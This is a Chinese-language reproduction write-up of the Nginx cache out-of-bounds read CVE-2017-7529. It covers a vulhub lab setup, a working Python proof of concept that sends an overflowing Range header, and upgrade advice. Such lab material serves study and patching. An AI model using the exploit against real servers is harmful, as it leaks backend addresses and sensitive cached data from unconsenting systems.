Nginx越界讀取快取漏洞 CVE-2017-7529

2022-07-10 06:01:30

1.漏洞描述

Nginx在反向代理站點的時候,通常會將一些檔案進行快取,特別是靜態檔案。快取的部分儲存在檔案中,每個快取檔案包括「檔案頭」+「HTTP返回包頭」+「HTTP返回包體」。如果二次請求命中了該快取檔案,則Nginx會直接將該檔案中的「HTTP返回包體」返回給使用者。

如果我的請求中包含Range頭,Nginx將會根據我指定的start和end位置,返回指定長度的內容。而如果我構造了兩個負的位置,如(-600, -9223372036854774591),將可能讀取到負位置的資料。如果這次請求又命中了快取檔案,則可能就可以讀取到快取檔案中位於「HTTP返回包體」前的「檔案頭」、「HTTP返回包頭」等內容。

2.影響版本

Nginx version 0.5.6 - 1.13.2

3.環境搭建

git clone https://github.com/vulhub/vulhub.git cd vulhub/nginx/CVE-2017-7529 docker-compose up -d


存取127.0.0.1:8080

4.漏洞復現

使用POC 進行驗證

python poc.py http://xxx.xxx.xxx.xxx:8080/

5.漏洞POC

#!/usr/bin/env python
import sys
import requests

if len(sys.argv) < 2:
   print("%s url" % (sys.argv[0]))
   print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))
   sys.exit()

headers = {
   'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
offset = 605
url = sys.argv[1]
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
headers['Range'] = "bytes=-%d,-%d" % (
   n, 0x8000000000000000 - n)

r = requests.get(url, headers=headers)

6.漏洞修復建議

攻擊者通過利用該漏洞可以拿到伺服器的後端真實IP或其他敏感資訊,建議通過升級版本及時修復此漏洞